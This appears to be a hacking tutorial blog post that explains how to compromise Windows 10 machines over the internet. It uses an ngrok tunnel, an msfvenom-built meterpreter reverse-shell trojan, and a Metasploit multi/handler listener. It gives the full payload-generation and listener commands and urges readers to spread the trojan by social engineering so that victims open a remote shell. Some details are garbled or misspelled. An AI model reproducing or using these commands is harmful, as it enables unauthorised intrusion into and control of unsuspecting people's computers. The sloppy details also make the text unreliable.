In all previous Metasploit or Kali Linux articles, I always perform attacks on LAN. So in this article, I will show you how to use Metasploit on the Internet over WAN.
A fairly common way is to forward router ports. But today we are going to discuss yet another method by which you can easily run Metasploit over WAN without using port forwarding as port forwarding is always a challenging task for all. we.
Hack Windows 10 remotely over WAN with Metasploit
Implementation steps:
- Create an account on ngrok.com.
- Download and configure Ngrok on your Kali Linux machine.
- Start the TCP or HTTP service.
- Generate payload with Msfvenom.
- Start Listener with Metasploit Framework.
- Spread your Trojan over the internet.
I will skip step 1 and step 2 because you can read through this article to do the first 2 steps.
After installing Ngrok, start the Ngrok TCP service on port 4444 by entering the command below:
./ngrok tcp 4444
You can use any port but I recommend using port 4444 for this case.
The next step is to create a malicious payload with the help of Msfvenom as follows:
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your Ngrok URL> LPORT=<Your Ngrok Port> -b “x00” -e x86/shikhata_ga_nai -f exe -o /root/Desktop/<filename>.exe
Explanation of options:
- -p stands for payload.
- -e stands for encoder.
- -o stands for output.
- -f stands for fileformat.
Msfvenom is a combination of Msfpayload and Msfencode, bringing both tools into a single Framework version. Msfvenom has replaced both msfpayload and msfencode as of June 8, 2015.
This is a list of available platforms that one can enter using the –platform option.
- Cisco or Cisco
- OSX or osx
- Solaris or solaris
- BSD or bsd
- OpenBSD or openbsd
- hardware
- Firefox or firefox
- BSDi or bsdi
- NetBSD or netbsd
- NodeJS or nodejs
- FreeBSD or freebsd
- Python or python
- AIX or aix
- JavaScript or javascript
- HPUX or hpux
- PHP or php
- Irix or irix
- Unix or unix
- Linux or linux
- Ruby or ruby
- Java or java
- Android or android
- Netware or netware
- Windows or windows
- mainframe
- multi
To see a list of all encoders, type “msfvenom -l encoders” into your terminal.
When the victim clicks on the gtavicty.exe file, the payload will be activated and will attempt to make a connection back to your system (LHOST). For a successful connection, you will need to open the multiprocessor in Metasploit to receive the connection.
Start the metasploit framework by typing “msfconsole” into your terminal.
The Exploit that we will use is “use exploit/multi/handler“
Payload is “set payload windows/meterpreter/reverse_tcp“
Here you need to set LHOST and LPORT.
set LHOST 0.0.0.0
set LPORT 4444
Just type “run” in your terminal. You can now use any social engineering method to spread your malicious executable over the Internet.
When the victim clicks on the gtavicty.exe executable, the meterpreter session will be opened immediately.
So here, ngrok will automatically forward all traffic to your localhost machine. Enter “sysinfo” to know more about your goal.
To know the process ID, just type “getpid” in the same terminal.
So that’s it then.